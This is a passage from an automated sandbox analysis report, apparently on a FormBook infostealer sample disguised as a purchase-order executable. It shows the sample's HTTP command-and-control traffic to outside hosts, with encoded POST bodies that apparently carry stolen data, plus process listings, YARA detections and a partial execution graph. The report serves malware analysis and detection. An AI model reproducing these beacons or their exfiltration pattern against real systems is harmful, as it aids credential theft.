                                Data Raw: 6a 54 5a 50 70 3d 6a 4a 2f 53 45 4d 73 70 2f 4e 35 33 36 79 31 32 49 2b 73 61 79 63 45 35 5a 59 32 6e 46 5a 6e 72 48 68 6a 2f 53 72 44 6a 68 51 7a 70 44 72 34 65 54 6b 34 47 38 34 6d 72 6b 30 44 63 63 6b 54 57 7a 52 35 38 41 55 65 4c 4d 62 77 34 50 56 6b 6c 4f 46 39 71 45 33 66 66 59 45 57 4b 4d 31 43 31 36 52 6b 76 63 63 6a 37 52 76 6c 6e 6f 6d 52 4a 50 69 72 34 71 57 50 52 71 51 30 75 43 46 79 45 30 79 35 77 32 5a 38 58 72 75 65 7a 50 54 4b 34 59 50 48 5a 4d 46 35 69 4e 61 78 73 53 58 7a 65 46 59 45 47 75 65 68 43 63 43 4a 76 36 71 43 48 59 69 54 69 53 70 35 53 4e 79 46 33 44 38 32 51 36 38 4b 72 61 66 68 65 52 43 6b 6a
                                Data Ascii: jTZPp=jJ/SEMsp/N536y12I+saycE5ZY2nFZnrHhj/SrDjhQzpDr4eTk4G84mrk0DcckTWzR58AUeLMbw4PVklOF9qE3ffYEWKM1C16Rkvccj7RvlnomRJPir4qWPRqQ0uCFyE0y5w2Z8XruezPTK4YPHZMF5iNaxsSXzeFYEGuehCcCJv6qCHYiTiSp5SNyF3D82Q68KrafheRCkj


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                46192.168.2.649758149.88.84.60801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:18:17.738014936 CEST749OUTPOST /hsw0/ HTTP/1.1
                                Host: www.bade.ink
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.bade.ink
                                Referer: http://www.bade.ink/hsw0/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 6a 4a 2f 53 45 4d 73 70 2f 4e 35 33 37 53 6c 32 4a 66 73 61 31 38 45 32 48 49 32 6e 65 70 6e 76 48 68 6e 2f 53 71 48 4a 67 6a 58 70 44 4c 49 65 51 6c 34 47 37 34 6d 72 38 6b 44 5a 42 30 54 64 7a 52 31 30 41 57 4b 4c 4d 62 30 34 50 52 67 6c 4f 32 6c 70 46 6e 66 64 4e 30 57 49 42 56 43 31 36 52 6b 76 63 63 6e 43 52 70 4e 6e 6f 57 42 4a 4a 44 72 35 69 32 50 53 74 51 30 75 47 46 79 41 30 79 34 6c 32 5a 4d 35 72 6f 53 7a 50 53 57 34 59 62 72 57 46 46 35 67 4a 61 77 43 61 6c 6d 45 64 4f 5a 43 72 6f 49 6b 49 56 31 75 32 38 44 64 45 52 54 42 41 35 5a 51 4e 77 64 46 44 63 32 36 34 38 79 72 49 49 74 35 65 32 42 41 66 74 4d 68 6f 37 61 50 49 37 47 78 48 6c 30 70 33 42 73 58 6a 67 3d 3d
                                Data Ascii: jTZPp=jJ/SEMsp/N537Sl2Jfsa18E2HI2nepnvHhn/SqHJgjXpDLIeQl4G74mr8kDZB0TdzR10AWKLMb04PRglO2lpFnfdN0WIBVC16RkvccnCRpNnoWBJJDr5i2PStQ0uGFyA0y4l2ZM5roSzPSW4YbrWFF5gJawCalmEdOZCroIkIV1u28DdERTBA5ZQNwdFDc2648yrIIt5e2BAftMho7aPI7GxHl0p3BsXjg==


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                47192.168.2.649759149.88.84.60801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:18:20.266633034 CEST1762OUTPOST /hsw0/ HTTP/1.1
                                Host: www.bade.ink
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.bade.ink
                                Referer: http://www.bade.ink/hsw0/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 6a 4a 2f 53 45 4d 73 70 2f 4e 35 33 37 53 6c 32 4a 66 73 61 31 38 45 32 48 49 32 6e 65 70 6e 76 48 68 6e 2f 53 71 48 4a 67 6a 66 70 44 61 6f 65 51 47 51 47 36 34 6d 72 31 45 44 59 42 30 54 41 7a 52 39 4b 41 57 57 39 4d 59 63 34 4d 30 30 6c 4d 48 6c 70 4d 6e 66 64 53 6b 57 4c 4d 31 44 74 36 52 30 77 63 66 50 43 52 70 4e 6e 6f 51 74 4a 4a 53 72 35 76 57 50 52 71 51 30 69 43 46 7a 58 30 79 68 65 32 59 35 4d 6f 59 79 7a 50 32 32 34 55 4f 48 57 4b 46 35 6d 46 36 77 73 61 6c 37 61 64 4b 35 6b 72 73 4a 50 49 53 64 75 31 71 57 61 51 53 6e 63 56 72 46 78 51 48 63 69 46 73 2b 74 35 73 32 4d 4e 35 42 54 66 55 78 43 47 4c 4d 6b 6f 61 2f 57 59 72 75 71 4a 51 70 62 79 6a 73 54 6a 38 65 65 64 2b 34 6a 71 43 35 51 68 2f 56 57 61 72 2b 76 74 46 76 4b 79 31 6c 67 55 33 4e 35 68 36 74 49 70 38 75 78 6e 56 74 77 7a 2b 78 71 33 45 4a 67 6f 6e 55 38 75 49 7a 4c 41 66 64 4e 4a 4c 64 58 2b 4b 64 5a 74 57 37 6c 47 37 71 49 54 30 6f 64 72 79 78 70 32 61 34 59 52 62 44 69 50 39 34 6b 4e 54 50 70 66 57 53 79 [TRUNCATED]
                                Data Ascii: jTZPp=jJ/SEMsp/N537Sl2Jfsa18E2HI2nepnvHhn/SqHJgjfpDaoeQGQG64mr1EDYB0TAzR9KAWW9MYc4M00lMHlpMnfdSkWLM1Dt6R0wcfPCRpNnoQtJJSr5vWPRqQ0iCFzX0yhe2Y5MoYyzP224UOHWKF5mF6wsal7adK5krsJPISdu1qWaQSncVrFxQHciFs+t5s2MN5BTfUxCGLMkoa/WYruqJQpbyjsTj8eed+4jqC5Qh/VWar+vtFvKy1lgU3N5h6tIp8uxnVtwz+xq3EJgonU8uIzLAfdNJLdX+KdZtW7lG7qIT0odryxp2a4YRbDiP94kNTPpfWSyJwcyr7tVILYiWAu1kA8x1rXhsKAKqJNrkNmUF/Rq9o+cHy0XMu5u21iOkR+uDyPk21Jk2Qz1qcOQEfByCrHjI0htdN4JlzSqVRfH6Z7BvHg/M7sxg1G19c/ULN4N8YBu2uk4ScjIq9hUF/xiqO3J562kUGLmRQ0BajGnLhYKhYpyCkVr4E40IXCcaAgN5LsKKJ4o5HzrIzpgRJ57suUWgzXbI3tAC07qU6IRDh+WIoYMWq/q4jfIbanZxxctVnQ8YjtNv+lC6kltyuPCumQJfEfYnEasZ/mAHGsI879eiL9p9G0lTzV14oUuTXjxemZSei63vQzKatPfYDigZjfqPRLRvnEmn5/oCacX56N6EfRN6dl1mroatSuWSsbBEmQqf5n8NmP8Tdni0imXgbjYJIKkNFPf7kkdSJeR6eYhaND9Jjdc6PgfmW9aDf4g4+vxCGIyhvXJd5RorBrxfxPauQd0SI0xs4UzbeO/Nye5H1QGoFcbK91tod72aOoyswdbEREmMNJoqGdwdi28OjobCwntIB6gI7a9dh2MCqkr3DEAM/Bzy/GE7yv1l8ab/UIX/srsgwvEcJ9ocAvl5LYkfDS6czuO11BNmv1gnwsxOdpM5jumZDQW8FOHAEXMBVf7wnIWsmWbsS6wjmkDdmQCS5woUkOMrlbptO [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                48192.168.2.649760149.88.84.60801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:18:22.943495989 CEST472OUTGET /hsw0/?jTZPp=uLXyH8QWgplw+01MGt5z7ZtXboPXNqbkC1uKFcneqhr1T/4kMzskxZHx0kzyKUbp4FdXPGelQZ0lXUIJIylJCH/YaybQLXyPxH18cc3uRqVtxx5ALXmeuWDvi0AdBTC67hBeitw=&5L0=2bCPy0 HTTP/1.1
                                Host: www.bade.ink
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                49192.168.2.6497613.33.130.190801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:18:49.380784035 CEST767OUTPOST /d42u/ HTTP/1.1
                                Host: www.futurereadyteaming.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.futurereadyteaming.com
                                Referer: http://www.futurereadyteaming.com/d42u/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 55 63 54 4b 59 6a 66 55 31 57 6e 6e 42 54 39 63 4f 75 6a 70 63 4e 32 61 4f 63 4a 57 46 2f 67 79 2f 4c 76 44 74 4c 55 77 2b 39 36 4a 35 54 42 6c 46 33 68 65 42 4b 50 56 32 79 43 59 37 42 6c 53 65 31 70 72 51 78 61 35 32 54 4a 61 41 65 73 53 63 6b 58 6e 4e 6d 2f 51 58 42 64 72 37 44 6b 2f 6f 6f 71 79 69 44 49 67 63 6a 4a 68 72 31 59 7a 70 63 63 6a 65 69 46 50 51 4d 5a 4f 58 31 38 4a 42 55 72 2b 2f 38 71 53 57 76 43 79 32 35 52 66 65 39 64 34 7a 30 74 47 48 2f 33 49 4b 57 57 38 73 2f 6e 59 57 44 50 76 55 48 37 32 45 68 78 45 79 79 63 72 64 59 30 73 67 4f 37 55 72 39 30 64 78 63 76 71 57 2b 74 6f 73 46 51 61
                                Data Ascii: jTZPp=UcTKYjfU1WnnBT9cOujpcN2aOcJWF/gy/LvDtLUw+96J5TBlF3heBKPV2yCY7BlSe1prQxa52TJaAesSckXnNm/QXBdr7Dk/ooqyiDIgcjJhr1YzpccjeiFPQMZOX18JBUr+/8qSWvCy25Rfe9d4z0tGH/3IKWW8s/nYWDPvUH72EhxEyycrdY0sgO7Ur90dxcvqW+tosFQa


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                50192.168.2.6497623.33.130.190801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:18:51.922416925 CEST791OUTPOST /d42u/ HTTP/1.1
                                Host: www.futurereadyteaming.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.futurereadyteaming.com
                                Referer: http://www.futurereadyteaming.com/d42u/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 55 63 54 4b 59 6a 66 55 31 57 6e 6e 54 69 4e 63 65 39 4c 70 5a 74 32 5a 43 38 4a 57 65 76 67 32 2f 4c 7a 44 74 4b 41 47 2b 4f 65 4a 35 32 6c 6c 58 46 5a 65 50 71 50 56 35 53 44 63 6b 52 6b 65 65 31 74 6a 51 77 6d 35 32 54 31 61 41 61 67 53 62 58 50 6b 4d 32 2f 53 66 68 64 74 6d 54 6b 2f 6f 6f 71 79 69 48 67 47 63 6a 52 68 33 52 63 7a 70 39 63 67 64 69 46 49 41 38 5a 4f 41 6c 38 4e 42 55 72 51 2f 39 32 30 57 73 32 79 32 38 56 66 65 73 64 37 39 45 74 4d 49 66 32 63 61 46 71 33 70 4e 53 34 65 77 61 4e 42 6c 2f 47 42 58 77 65 75 42 63 49 50 49 55 75 67 4d 6a 6d 72 64 30 33 7a 63 58 71 45 70 68 50 6a 78 31 35 72 33 74 71 37 6c 44 2b 2b 79 45 32 46 35 66 56 37 6f 78 6e 6a 41 3d 3d
                                Data Ascii: jTZPp=UcTKYjfU1WnnTiNce9LpZt2ZC8JWevg2/LzDtKAG+OeJ52llXFZePqPV5SDckRkee1tjQwm52T1aAagSbXPkM2/SfhdtmTk/ooqyiHgGcjRh3Rczp9cgdiFIA8ZOAl8NBUrQ/920Ws2y28Vfesd79EtMIf2caFq3pNS4ewaNBl/GBXweuBcIPIUugMjmrd03zcXqEphPjx15r3tq7lD++yE2F5fV7oxnjA==


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                51192.168.2.6497633.33.130.190801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:18:54.501610041 CEST1804OUTPOST /d42u/ HTTP/1.1
                                Host: www.futurereadyteaming.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.futurereadyteaming.com
                                Referer: http://www.futurereadyteaming.com/d42u/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 55 63 54 4b 59 6a 66 55 31 57 6e 6e 54 69 4e 63 65 39 4c 70 5a 74 32 5a 43 38 4a 57 65 76 67 32 2f 4c 7a 44 74 4b 41 47 2b 4f 57 4a 34 45 74 6c 47 53 4e 65 4f 71 50 56 6e 69 44 52 6b 52 6b 54 65 78 35 76 51 77 71 44 32 56 35 61 47 2f 38 53 61 6d 50 6b 47 32 2f 53 64 68 64 6f 37 44 6c 39 6f 73 4f 74 69 44 4d 47 63 6a 52 68 33 51 73 7a 67 4d 63 67 52 43 46 50 51 4d 5a 34 58 31 38 78 42 51 48 6d 2f 39 43 37 58 66 75 79 32 63 6c 66 54 2b 6c 37 2f 6b 74 43 4a 66 32 55 61 46 6e 76 70 4a 79 43 65 7a 48 59 42 6c 37 47 42 6a 6b 4a 7a 78 67 6c 62 4b 4d 68 31 2b 76 2b 73 38 42 47 37 50 43 58 4c 6f 55 2b 69 79 68 49 75 6e 70 32 36 55 32 68 39 69 4d 71 45 65 6a 46 78 34 63 77 38 49 32 2b 56 59 48 59 49 6f 33 6e 71 31 55 52 6a 74 70 36 49 59 48 57 51 7a 63 78 6e 76 63 67 54 48 65 36 4b 6f 58 35 58 65 55 44 43 59 44 61 35 33 57 2f 73 4f 4d 4d 52 6d 48 6e 53 41 38 66 55 6d 63 51 61 61 6e 6f 51 36 38 55 74 74 41 30 4f 42 33 50 5a 79 64 50 64 59 34 34 52 53 2f 63 31 4d 7a 32 4f 36 59 50 4e 61 30 5a [TRUNCATED]
                                Data Ascii: jTZPp=UcTKYjfU1WnnTiNce9LpZt2ZC8JWevg2/LzDtKAG+OWJ4EtlGSNeOqPVniDRkRkTex5vQwqD2V5aG/8SamPkG2/Sdhdo7Dl9osOtiDMGcjRh3QszgMcgRCFPQMZ4X18xBQHm/9C7Xfuy2clfT+l7/ktCJf2UaFnvpJyCezHYBl7GBjkJzxglbKMh1+v+s8BG7PCXLoU+iyhIunp26U2h9iMqEejFx4cw8I2+VYHYIo3nq1URjtp6IYHWQzcxnvcgTHe6KoX5XeUDCYDa53W/sOMMRmHnSA8fUmcQaanoQ68UttA0OB3PZydPdY44RS/c1Mz2O6YPNa0ZJ41gYENr2h+QZPAiedUOqi47OUsEQHK8iENcqxFawqzdyljPhj5IboDPGSjPqH8LHePY9ukr99+j1gV6Z6Drm0Xu/xJXpyUv1k+7klycEncJG8VUAzV8DY3zwuREHKnpMyUnOFtq83DlhhjpX0Z0uTrPyhx1jk8i1QoZPtwIei+CuMd+ZicuCvxrZBL9qPlta/KgRjfiLIlDqxAuzKVHOZ5FyzKdH6NAB7hqIvXyrt3a8zsxhSGkriYxBBGsU8Oq/a7xHTXmbGpXOwYYry9OJR/i1e7ldbRGHYu/9GxTD8Mkf66HayVSqleWkUy4dqF5LBzZNzy7j9+1WF9Q23g7IgmKLyDJUK5kCF9i7r5xoRzweAj+aTf6MTF/Duzzn2y8jXJgZUVD2t2PX5pMapCkjEuQyjff4YUD5lKwWUtgjIdo0vPPvKoqK1i9igqO80yjFgRnDS8P7rQgVZUfVGQzRoVIQIV6vLbOVWdPpiMZWvnPPPbGHFvyI9Qte6mrLsYe6qZcRJ6kBsJarbhvpCf8rFNlT+2ZamQ0H0MfkX7kq+6lltpecka1C9HgCQX+RpwAvR5lGtmaVcY41VSG1/zbq8PuCruM+bQqe7+ovmGSW4wkuFqs875K/b/jVpCDoJaGwHRpXRuxsIANy7g3e9JhBiCCtf9TC2tsnM [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                52192.168.2.6497643.33.130.190801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:18:57.581764936 CEST486OUTGET /d42u/?5L0=2bCPy0&jTZPp=Ze7qbULGym30DRtQWsDfUIjVKpc2N+ML3rKw6d8OwfGV5TB4Wy1SHsGQ3DzxzCIAckJPchaY62h3E/MXdBzELEbBfEli2wFapMH+8i0kZSl6sSBwn68EdR90A4BAIxslEVvZhZo= HTTP/1.1
                                Host: www.futurereadyteaming.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:18:58.062290907 CEST408INHTTP/1.1 200 OK
                                Server: openresty
                                Date: Tue, 28 May 2024 05:18:58 GMT
                                Content-Type: text/html
                                Content-Length: 268
                                Connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 35 4c 30 3d 32 62 43 50 79 30 26 6a 54 5a 50 70 3d 5a 65 37 71 62 55 4c 47 79 6d 33 30 44 52 74 51 57 73 44 66 55 49 6a 56 4b 70 63 32 4e 2b 4d 4c 33 72 4b 77 36 64 38 4f 77 66 47 56 35 54 42 34 57 79 31 53 48 73 47 51 33 44 7a 78 7a 43 49 41 63 6b 4a 50 63 68 61 59 36 32 68 33 45 2f 4d 58 64 42 7a 45 4c 45 62 42 66 45 6c 69 32 77 46 61 70 4d 48 2b 38 69 30 6b 5a 53 6c 36 73 53 42 77 6e 36 38 45 64 52 39 30 41 34 42 41 49 78 73 6c 45 56 76 5a 68 5a 6f 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5L0=2bCPy0&jTZPp=Ze7qbULGym30DRtQWsDfUIjVKpc2N+ML3rKw6d8OwfGV5TB4Wy1SHsGQ3DzxzCIAckJPchaY62h3E/MXdBzELEbBfEli2wFapMH+8i0kZSl6sSBwn68EdR90A4BAIxslEVvZhZo="}</script></head></html>


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:01:14:50
                                Start date:28/05/2024
                                Path:C:\Users\user\Desktop\Purchase Order_20240528.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Purchase Order_20240528.exe"
                                Imagebase:0x3f0000
                                File size:729'608 bytes
                                MD5 hash:B6422C6C56CDAB2A43415FDCCEEAF3E6
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:3
                                Start time:01:14:52
                                Start date:28/05/2024
                                Path:C:\Users\user\Desktop\Purchase Order_20240528.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Purchase Order_20240528.exe"
                                Imagebase:0xaa0000
                                File size:729'608 bytes
                                MD5 hash:B6422C6C56CDAB2A43415FDCCEEAF3E6
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2213803816.0000000001900000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2213803816.0000000001900000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:4
                                Start time:01:14:57
                                Start date:28/05/2024
                                Path:C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe"
                                Imagebase:0x3a0000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4538883092.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4538883092.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:5
                                Start time:01:14:58
                                Start date:28/05/2024
                                Path:C:\Windows\SysWOW64\nslookup.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\nslookup.exe"
                                Imagebase:0x2a0000
                                File size:77'824 bytes
                                MD5 hash:9D2EB13476B126CB61B12CDD03C7DCA6
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4539802866.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4539802866.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:moderate
                                Has exited:false

                                General

                                Target ID:7
                                Start time:01:15:12
                                Start date:28/05/2024
                                Path:C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe"
                                Imagebase:0x3a0000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4541673061.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4541673061.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:9
                                Start time:01:15:25
                                Start date:28/05/2024
                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                Imagebase:0x7ff728280000
                                File size:676'768 bytes
                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:7.7%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:155
                                  Total number of Limit Nodes:8
                                  execution_graph 20679 e1d780 20680 e1d7c6 GetCurrentProcess 20679->20680 20682 e1d811 20680->20682 20683 e1d818 GetCurrentThread 20680->20683 20682->20683 20684 e1d855 GetCurrentProcess 20683->20684 20685 e1d84e 20683->20685 20686 e1d88b GetCurrentThreadId 20684->20686 20685->20684 20688 e1d8e4 20686->20688 20689 6d18a50 20690 6d18a54 20689->20690 20691 6d18a58 FindCloseChangeNotification 20689->20691 20690->20691 20692 6d18abf 20691->20692 20710 e1b3f0 20713 e1b4e9 20710->20713 20711 e1b3ff 20714 e1b4f9 20713->20714 20715 e1b514 20713->20715 20714->20715 20717 e1b780 20714->20717 20715->20711 20718 e1b794 20717->20718 20720 e1b7b9 20718->20720 20721 e1b208 20718->20721 20720->20715 20722 e1b960 LoadLibraryExW 20721->20722 20724 e1b9d9 20722->20724 20724->20720 20693 e1d9c8 DuplicateHandle 20694 e1da5e 20693->20694 20695 e14668 20696 e14672 20695->20696 20698 e14769 20695->20698 20699 e1477d 20698->20699 20702 e14868 20699->20702 20703 e1488f 20702->20703 20704 e1496c 20703->20704 20706 e144b0 20703->20706 20707 e158f8 CreateActCtxA 20706->20707 20709 e159bb 20707->20709 20725 e1b6d8 20726 e1b720 GetModuleHandleW 20725->20726 20727 e1b71a 20725->20727 20728 e1b74d 20726->20728 20727->20726 20729 6d16ca8 20730 6d16e33 20729->20730 20732 6d16cce 20729->20732 20732->20730 20733 6d12df0 20732->20733 20734 6d16f28 PostMessageW 20733->20734 20735 6d16f94 20734->20735 20735->20732 20736 6d151ee 20738 6d150c6 20736->20738 20737 6d153a4 20738->20737 20742 6d15b30 20738->20742 20756 